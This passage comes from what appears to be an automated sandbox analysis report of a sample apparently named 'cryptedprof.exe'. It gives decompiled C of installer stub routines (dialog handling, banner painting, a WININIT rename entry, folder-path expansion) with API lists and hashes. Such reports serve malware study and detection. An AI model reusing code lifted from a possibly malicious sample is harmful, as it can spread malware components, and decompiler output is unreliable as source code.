                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 2564846305-813528018
                                                                                        • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                        • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                        • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                        • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 91%
                                                                                        			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                        				char _v8;
                                                                                        				signed int _v12;
                                                                                        				void* _v16;
                                                                                        				struct HWND__* _t52;
                                                                                        				long _t86;
                                                                                        				int _t98;
                                                                                        				struct HWND__* _t99;
                                                                                        				signed int _t100;
                                                                                        				intOrPtr _t107;
                                                                                        				intOrPtr _t109;
                                                                                        				int _t110;
                                                                                        				signed int* _t112;
                                                                                        				signed int _t113;
                                                                                        				char* _t114;
                                                                                        				CHAR* _t115;
                                                                                        
                                                                                        				if(_a8 != 0x110) {
                                                                                        					if(_a8 != 0x111) {
                                                                                        						L11:
                                                                                        						if(_a8 != 0x4e) {
                                                                                        							if(_a8 == 0x40b) {
                                                                                        								 *0x429884 =  *0x429884 + 1;
                                                                                        							}
                                                                                        							L25:
                                                                                        							_t110 = _a16;
                                                                                        							L26:
                                                                                        							return E00404338(_a8, _a12, _t110);
                                                                                        						}
                                                                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                        						_t110 = _a16;
                                                                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                        							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                        							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                        							_v12 = _t100;
                                                                                        							_v16 = _t109;
                                                                                        							_v8 = 0x42e3e0;
                                                                                        							if(_t100 - _t109 < 0x800) {
                                                                                        								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                        								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                        								_push(1);
                                                                                        								_t40 =  &_v8; // 0x42e3e0
                                                                                        								E004046E0(_a4,  *_t40);
                                                                                        								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                        								_t110 = _a16;
                                                                                        							}
                                                                                        						}
                                                                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                        							goto L26;
                                                                                        						} else {
                                                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                        								SendMessageA( *0x42f448, 0x111, 1, 0);
                                                                                        							}
                                                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                        								SendMessageA( *0x42f448, 0x10, 0, 0);
                                                                                        							}
                                                                                        							return 1;
                                                                                        						}
                                                                                        					}
                                                                                        					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
                                                                                        						goto L25;
                                                                                        					} else {
                                                                                        						_t112 =  *0x42a090 + 0x14;
                                                                                        						if(( *_t112 & 0x00000020) == 0) {
                                                                                        							goto L25;
                                                                                        						}
                                                                                        						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                        						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                        						E004046BC();
                                                                                        						goto L11;
                                                                                        					}
                                                                                        				}
                                                                                        				_t98 = _a16;
                                                                                        				_t113 =  *(_t98 + 0x30);
                                                                                        				if(_t113 < 0) {
                                                                                        					_t107 =  *0x42ec1c; // 0x6301d0
                                                                                        					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                        				}
                                                                                        				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                        				_t114 = _t113 +  *0x42f498;
                                                                                        				_push(0x22);
                                                                                        				_a16 =  *_t114;
                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                        				_t115 = _t114 + 1;
                                                                                        				_v16 = _t115;
                                                                                        				_v8 = E00404407;
                                                                                        				E004042D1(_a4);
                                                                                        				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                        				_push(0x23);
                                                                                        				E004042D1(_a4);
                                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                        				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                        				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                        				E00404306(_t99);
                                                                                        				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                        				_t86 =  *( *0x42f454 + 0x68);
                                                                                        				if(_t86 < 0) {
                                                                                        					_t86 = GetSysColor( ~_t86);
                                                                                        				}
                                                                                        				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                        				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                        				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                        				 *0x429884 = 0;
                                                                                        				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                        				 *0x429884 = 0;
                                                                                        				return 0;
                                                                                        			}



















                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
                                                                                        • GetDlgItem.USER32 ref: 004044DB
                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
                                                                                        • GetSysColor.USER32(?), ref: 0040450A
                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040452B
                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
                                                                                        • GetDlgItem.USER32 ref: 004045B1
                                                                                        • SendMessageA.USER32(00000000), ref: 004045B4
                                                                                        • GetDlgItem.USER32 ref: 004045DF
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
                                                                                        • LoadCursorA.USER32 ref: 0040462E
                                                                                        • SetCursor.USER32(00000000), ref: 00404637
                                                                                        • LoadCursorA.USER32 ref: 0040464D
                                                                                        • SetCursor.USER32(00000000), ref: 00404650
                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                        • String ID: N$B
                                                                                        • API String ID: 3103080414-4074832742
                                                                                        • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                        • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                        • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                        • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                        				struct tagLOGBRUSH _v16;
                                                                                        				struct tagRECT _v32;
                                                                                        				struct tagPAINTSTRUCT _v96;
                                                                                        				struct HDC__* _t70;
                                                                                        				struct HBRUSH__* _t87;
                                                                                        				struct HFONT__* _t94;
                                                                                        				long _t102;
                                                                                        				signed int _t126;
                                                                                        				struct HDC__* _t128;
                                                                                        				intOrPtr _t130;
                                                                                        
                                                                                        				if(_a8 == 0xf) {
                                                                                        					_t130 =  *0x42f454;
                                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                        					_a8 = _t70;
                                                                                        					GetClientRect(_a4,  &_v32);
                                                                                        					_t126 = _v32.bottom;
                                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                        					while(_v32.top < _t126) {
                                                                                        						_a12 = _t126 - _v32.top;
                                                                                        						asm("cdq");
                                                                                        						asm("cdq");
                                                                                        						asm("cdq");
                                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                                        						_a16 = _t87;
                                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                                        						DeleteObject(_a16);
                                                                                        						_v32.top = _v32.top + 4;
                                                                                        					}
                                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                        						_a16 = _t94;
                                                                                        						if(_t94 != 0) {
                                                                                        							_t128 = _a8;
                                                                                        							_v32.left = 0x10;
                                                                                        							_v32.top = 8;
                                                                                        							SetBkMode(_t128, 1);
                                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                                        							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
                                                                                        							SelectObject(_t128, _a8);
                                                                                        							DeleteObject(_a16);
                                                                                        						}
                                                                                        					}
                                                                                        					EndPaint(_a4,  &_v96);
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t102 = _a16;
                                                                                        				if(_a8 == 0x46) {
                                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
                                                                                        				}
                                                                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                        			}

                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F$Setup Setup
                                                                                        • API String ID: 941294808-1602013819
                                                                                        • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                        • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                        • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                        • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405EBC(void* __ecx) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				long _t12;
                                                                                        				long _t24;
                                                                                        				char* _t31;
                                                                                        				int _t37;
                                                                                        				void* _t38;
                                                                                        				intOrPtr* _t39;
                                                                                        				long _t42;
                                                                                        				CHAR* _t44;
                                                                                        				void* _t46;
                                                                                        				void* _t48;
                                                                                        				void* _t49;
                                                                                        				void* _t52;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				_t38 = __ecx;
                                                                                        				_t44 =  *(_t52 + 0x14);
                                                                                        				 *0x42c648 = 0x4c554e;
                                                                                        				if(_t44 == 0) {
                                                                                        					L3:
                                                                                        					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
                                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                        						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
                                                                                        						_t53 = _t52 + 0x10;
                                                                                        						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
                                                                                        						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
                                                                                        						_t48 = _t12;
                                                                                        						 *(_t53 + 0x18) = _t48;
                                                                                        						if(_t48 != 0xffffffff) {
                                                                                        							_t42 = GetFileSize(_t48, 0);
                                                                                        							_t6 = _t37 + 0xa; // 0xa
                                                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                        							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
                                                                                        								L18:
                                                                                        								return CloseHandle(_t48);
                                                                                        							} else {
                                                                                        								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                        									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
                                                                                        									if(_t49 == 0) {
                                                                                        										_t48 =  *(_t53 + 0x18);
                                                                                        										L16:
                                                                                        										_t24 = _t42;
                                                                                        										L17:
                                                                                        										E00405DA1(_t24 + _t46, 0x42c248, _t37);
                                                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                                                        										E00405E8D(_t48, _t46, _t42 + _t37);
                                                                                        										GlobalFree(_t46);
                                                                                        										goto L18;
                                                                                        									}
                                                                                        									_t39 = _t46 + _t42;
                                                                                        									_t31 = _t39 + _t37;
                                                                                        									while(_t39 > _t49) {
                                                                                        										 *_t31 =  *_t39;
                                                                                        										_t31 = _t31 - 1;
                                                                                        										_t39 = _t39 - 1;
                                                                                        									}
                                                                                        									_t24 = _t49 - _t46 + 1;
                                                                                        									_t48 =  *(_t53 + 0x18);
                                                                                        									goto L17;
                                                                                        								}
                                                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                        								_t42 = _t42 + 0xa;
                                                                                        								goto L16;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					CloseHandle(E00405DE6(_t44, 0, 1));
                                                                                        					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
                                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                        						goto L3;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t12;
                                                                                        			}

                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                                                          • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                          • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                                        • wsprintfA.USER32 ref: 00405F31
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                        • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                        • GlobalFree.KERNEL32 ref: 0040601A
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                                          • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405DEA
                                                                                          • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                        • String ID: %s=%s$[Rename]
                                                                                        • API String ID: 2171350718-1727408572
                                                                                        • Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                        • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                                        • Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                        • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                        				struct _ITEMIDLIST* _v8;
                                                                                        				char _v12;
                                                                                        				signed int _v16;
                                                                                        				signed char _v20;
                                                                                        				signed int _v24;
                                                                                        				signed char _v28;
                                                                                        				signed int _t38;
                                                                                        				CHAR* _t39;
                                                                                        				signed int _t41;
                                                                                        				char _t52;
                                                                                        				char _t53;
                                                                                        				char _t55;
                                                                                        				char _t57;
                                                                                        				void* _t65;
                                                                                        				char* _t66;
                                                                                        				signed int _t80;
                                                                                        				intOrPtr _t86;
                                                                                        				char _t88;
                                                                                        				void* _t89;
                                                                                        				CHAR* _t90;
                                                                                        				void* _t92;
                                                                                        				signed int _t97;
                                                                                        				signed int _t99;
                                                                                        				void* _t100;
                                                                                        
                                                                                        				_t92 = __esi;
                                                                                        				_t89 = __edi;
                                                                                        				_t65 = __ebx;
                                                                                        				_t38 = _a8;
                                                                                        				if(_t38 < 0) {
                                                                                        					_t86 =  *0x42ec1c; // 0x6301d0
                                                                                        					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                        				}
                                                                                        				_push(_t65);
                                                                                        				_push(_t92);
                                                                                        				_push(_t89);
                                                                                        				_t66 = _t38 +  *0x42f498;
                                                                                        				_t39 = 0x42e3e0;
                                                                                        				_t90 = 0x42e3e0;
                                                                                        				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
                                                                                        					_t90 = _a4;
                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                        				}
                                                                                        				while(1) {
                                                                                        					_t88 =  *_t66;
                                                                                        					if(_t88 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					__eflags = _t90 - _t39 - 0x400;
                                                                                        					if(_t90 - _t39 >= 0x400) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t66 = _t66 + 1;
                                                                                        					__eflags = _t88 - 4;
                                                                                        					_a8 = _t66;
                                                                                        					if(__eflags >= 0) {
                                                                                        						if(__eflags != 0) {
                                                                                        							 *_t90 = _t88;
                                                                                        							_t90 =  &(_t90[1]);
                                                                                        							__eflags = _t90;
                                                                                        						} else {
                                                                                        							 *_t90 =  *_t66;
                                                                                        							_t90 =  &(_t90[1]);
                                                                                        							_t66 = _t66 + 1;
                                                                                        						}
                                                                                        						continue;
                                                                                        					}
                                                                                        					_t41 =  *((char*)(_t66 + 1));
                                                                                        					_t80 =  *_t66;
                                                                                        					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                        					_v24 = _t80;
                                                                                        					_v28 = _t80 | 0x00000080;
                                                                                        					_v16 = _t41;
                                                                                        					_v20 = _t41 | 0x00000080;
                                                                                        					_t66 = _a8 + 2;
                                                                                        					__eflags = _t88 - 2;
                                                                                        					if(_t88 != 2) {
                                                                                        						__eflags = _t88 - 3;
                                                                                        						if(_t88 != 3) {
                                                                                        							__eflags = _t88 - 1;
                                                                                        							if(_t88 == 1) {
                                                                                        								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                        								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                        							}
                                                                                        							L42:
                                                                                        							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                        							_t39 = 0x42e3e0;
                                                                                        							continue;
                                                                                        						}
                                                                                        						__eflags = _t97 - 0x1d;
                                                                                        						if(_t97 != 0x1d) {
                                                                                        							__eflags = (_t97 << 0xa) + 0x430000;
                                                                                        							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
                                                                                        						} else {
                                                                                        							E004061AB(_t90,  *0x42f448);
                                                                                        						}
                                                                                        						__eflags = _t97 + 0xffffffeb - 7;
                                                                                        						if(_t97 + 0xffffffeb < 7) {
                                                                                        							L33:
                                                                                        							E00406528(_t90);
                                                                                        						}
                                                                                        						goto L42;
                                                                                        					}
                                                                                        					_t52 =  *0x42f44c;
                                                                                        					__eflags = _t52;
                                                                                        					_t99 = 2;
                                                                                        					if(_t52 >= 0) {
                                                                                        						L13:
                                                                                        						_a8 = 1;
                                                                                        						L14:
                                                                                        						__eflags =  *0x42f4e4;
                                                                                        						if( *0x42f4e4 != 0) {
                                                                                        							_t99 = 4;
                                                                                        						}
                                                                                        						__eflags = _t80;
                                                                                        						if(__eflags >= 0) {
                                                                                        							__eflags = _t80 - 0x25;
                                                                                        							if(_t80 != 0x25) {
                                                                                        								__eflags = _t80 - 0x24;
                                                                                        								if(_t80 == 0x24) {
                                                                                        									GetWindowsDirectoryA(_t90, 0x400);
                                                                                        									_t99 = 0;
                                                                                        								}
                                                                                        								while(1) {
                                                                                        									__eflags = _t99;
                                                                                        									if(_t99 == 0) {
                                                                                        										goto L30;
                                                                                        									}
                                                                                        									_t53 =  *0x42f444;
                                                                                        									_t99 = _t99 - 1;
                                                                                        									__eflags = _t53;
                                                                                        									if(_t53 == 0) {
                                                                                        										L26:
                                                                                        										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                        										__eflags = _t55;
                                                                                        										if(_t55 != 0) {
                                                                                        											L28:
                                                                                        											 *_t90 =  *_t90 & 0x00000000;
                                                                                        											__eflags =  *_t90;
                                                                                        											continue;
                                                                                        										}
                                                                                        										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                        										_v12 = _t55;
                                                                                        										__imp__CoTaskMemFree(_v8);
                                                                                        										__eflags = _v12;
                                                                                        										if(_v12 != 0) {
                                                                                        											goto L30;
                                                                                        										}
                                                                                        										goto L28;
                                                                                        									}
                                                                                        									__eflags = _a8;
                                                                                        									if(_a8 == 0) {
                                                                                        										goto L26;
                                                                                        									}
                                                                                        									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                                        									__eflags = _t57;
                                                                                        									if(_t57 == 0) {
                                                                                        										goto L30;
                                                                                        									}
                                                                                        									goto L26;
                                                                                        								}
                                                                                        								goto L30;
                                                                                        							}
                                                                                        							GetSystemDirectoryA(_t90, 0x400);
                                                                                        							goto L30;
                                                                                        						} else {
                                                                                        							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
                                                                                        							__eflags =  *_t90;
                                                                                        							if( *_t90 != 0) {
                                                                                        								L31:
                                                                                        								__eflags = _v16 - 0x1a;
                                                                                        								if(_v16 == 0x1a) {
                                                                                        									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                        								}
                                                                                        								goto L33;
                                                                                        							}
                                                                                        							E004062E0(_t66, _t90, _t99, _t90, _v16);
                                                                                        							L30:
                                                                                        							__eflags =  *_t90;
                                                                                        							if( *_t90 == 0) {
                                                                                        								goto L33;
                                                                                        							}
                                                                                        							goto L31;
                                                                                        						}
                                                                                        					}
                                                                                        					__eflags = _t52 - 0x5a04;
                                                                                        					if(_t52 == 0x5a04) {
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					__eflags = _v16 - 0x23;
                                                                                        					if(_v16 == 0x23) {
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					__eflags = _v16 - 0x2e;
                                                                                        					if(_v16 == 0x2e) {
                                                                                        						goto L13;
                                                                                        					} else {
                                                                                        						_a8 = _a8 & 0x00000000;
                                                                                        						goto L14;
                                                                                        					}
                                                                                        				}
                                                                                        				 *_t90 =  *_t90 & 0x00000000;
                                                                                        				if(_a4 == 0) {
                                                                                        					return _t39;
                                                                                        				}
                                                                                        				return E0040624D(_a4, _t39);
                                                                                        			}



























                                                                                        0x00000000
                                                                                        0x00406446
                                                                                        0x00406448
                                                                                        0x0040644a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040644a
                                                                                        0x00000000
                                                                                        0x00406483
                                                                                        0x0040640b
                                                                                        0x00000000
                                                                                        0x004063c9
                                                                                        0x004063e4
                                                                                        0x004063e9
                                                                                        0x004063ec
                                                                                        0x0040648c
                                                                                        0x0040648c
                                                                                        0x00406490
                                                                                        0x00406498
                                                                                        0x00406498
                                                                                        0x00000000
                                                                                        0x00406490
                                                                                        0x004063f6
                                                                                        0x00406487
                                                                                        0x00406487
                                                                                        0x0040648a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040648a
                                                                                        0x004063c7
                                                                                        0x0040639a
                                                                                        0x0040639e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063a0
                                                                                        0x004063a4
